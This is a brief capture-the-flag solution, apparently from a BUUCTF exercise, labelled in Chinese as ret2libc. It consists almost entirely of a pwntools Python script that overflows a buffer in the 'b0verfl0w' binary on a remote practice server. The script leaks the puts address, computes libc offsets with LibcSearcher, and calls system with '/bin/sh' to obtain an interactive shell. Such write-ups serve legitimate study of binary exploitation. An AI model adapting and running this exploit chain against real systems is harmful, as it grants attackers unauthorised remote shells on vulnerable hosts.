是ret2libc类型
from pwn import *
from LibcSearcher import *
p = remote('node3.buuoj.cn',25524)
elf = ELF('./b0verfl0w')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=0x804850e
payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got)
p.sendlineafter("What's your name?",payload)
p.recvuntil('.')
puts_addr=u32(p.recv(4))
libc=LibcSearcher("puts",puts_addr)
offset=puts_addr-libc.dump('puts')
sys=offset+libc.dump('system')
bin=offset+libc.dump('str_bin_sh')
payload='a'*(0x20+4)+p32(sys)+p32(0)+p32(bin)
p.sendlineafter("What's your name?",payload)
p.interactive()